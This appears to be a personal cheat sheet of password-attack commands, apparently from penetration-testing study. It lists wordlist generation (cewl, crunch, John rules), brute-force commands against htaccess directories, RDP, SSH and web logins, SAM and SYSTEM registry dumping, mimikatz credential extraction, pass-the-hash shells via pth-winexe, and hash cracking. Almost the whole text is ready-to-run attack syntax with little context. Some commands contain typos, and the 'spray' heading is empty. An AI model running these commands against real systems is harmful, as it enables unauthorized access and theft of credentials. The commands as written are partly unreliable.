
### make a custom wordlist for a website using cewl and JTR:

cewl www.mywebsite.com -m 6 -w myCewlPasswords.txt  

sudo nano /etc/john/john.conf    ;then add " $[0-9][0-9] " to put two degit after every word;then: 

jhon --wordlist=myCewlPasswords.txt --rules --stdout > mutated.txt

------------------------------------------------------

### make custom wordlist using crunch:

crunch 8 8 -t ,@@^^%%% -o file.txt
    min^ ^max  
	       ,:uppercase
	       @:lowercase
	       ^:special characters
	       %:Numeric characters  


crunch 4 6 0123456789ABCDEF -o file.txt

crunch 4 6 -f /usr/share/crunch/charset.lst mixalpha -o crunch.txt

=======================================================

### medusa, best for web directory htacess-protected:
 
medusa -h <ip> -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/anydirectory

### crowbar, best for rdp auth brute force:

crowbar -b rdp -s <server ip/prefix> -u admin -c ~/passwordfile.txt -n 1

### hydra, best for ssh attack:

hydra -l <user> -P /usr/share/wordlists/rockyou.txt ssh://<ip>

### hydra, best for web login auth:

hydra <ip> http-format-<get or post> -l <user> -P <rockyou.txt> -vV -f "loginpage.php:requestbody^USER^ & ^PASS^:error message"  

### spray

=======================================================

save reg HKEY_LOCAL_MACHINE\SAM	c:\sam
save reg HKEY_LOCAL_MACHINE\SYSTEM  c:\sys

========================================================
mimikatz usage: 

privilege::debug

token::elevate

lsadump::sam

sekurlsa::pth /user:administrator /domain:localhost /ntlm:sadadafaffaasfasfsafsafasfa   ----> open admin's cmd with hash

========================================================

dump tools:
pwddump, fgdump,samdump2 ,windows credintial editor 'wce'

========================================================

pth-winexe usage for authintication with smb protocol :

pth-winexe -U <user>%<the static part: aad3b435b51404eeaad3b435b51404ee>:<NTLM hash> //<ip> cmd

========================================================

crack the hash using john the rupper:

sudo john hash.txt --format=NT

john --rules --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=NT

unshadow passwd-file.txt shadow-file.txt > unshadow.txt

##### using hashcat is very powerfull and time saver 




















